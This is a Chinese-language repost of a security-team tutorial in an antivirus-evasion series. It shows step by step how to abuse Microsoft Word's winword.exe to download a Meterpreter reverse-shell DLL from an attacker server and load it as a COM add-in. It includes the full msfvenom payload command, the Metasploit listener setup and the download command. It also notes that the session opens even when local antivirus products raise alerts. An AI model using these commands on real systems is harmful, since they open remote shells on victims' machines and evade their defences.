免杀专题(50)-白名单winword.exe执行payload

oldmoon

免杀专题(50)-白名单winword.exe执行payload

转载自微信公众号：Tide安全团队      作者：Zhangyida

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

一、winword简介

winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。

二、通过winword.exe执行payload

msfvenom生成木马：

1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll

复制代码

设置监听：

1. use exploit/multi/handler
   
2. set payload windows/meterpreter/reverse_tcp
   
3. set lhost 192.168.19.146
   
4. set lport 23333
   
5. exploit
   

复制代码

winword.exe下载payload：

1. winword.exe "http://192.168.19.146/shell.dll"

复制代码

在未开启杀毒软件的情况下，winword.exe未对远程文件做校验直接下载到本地，下载的文件位置：

1. C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

复制代码

在开启杀毒软件的情况下执行该下载命令时会被拦截，下载的dll文件也会被删除：


winword.exe客户端会以只读的形式乱码显示文件内容：

通过winword.exe加载dll文件，步骤如下：

1. 文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件

复制代码

添加成功后顺利建立会话：

当火绒和360处于开启的情况下，添加木马dll会报警，但会话依旧会建立：




三、总结

• 使用msfvenom生成的木马在下载时就会被查杀，建议使用免杀效果更好的工具生成木马。
• winword.exe在加载木马时调用rundll32.exe程序，所以只能使用32位dll。
• 下载的木马文件即使关闭office程序后也不会被删除。
• vt免杀结果感人：
  
  

四、参考资料
[url=lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/]lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/[/url]

通过微软office下载和执行payload：https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191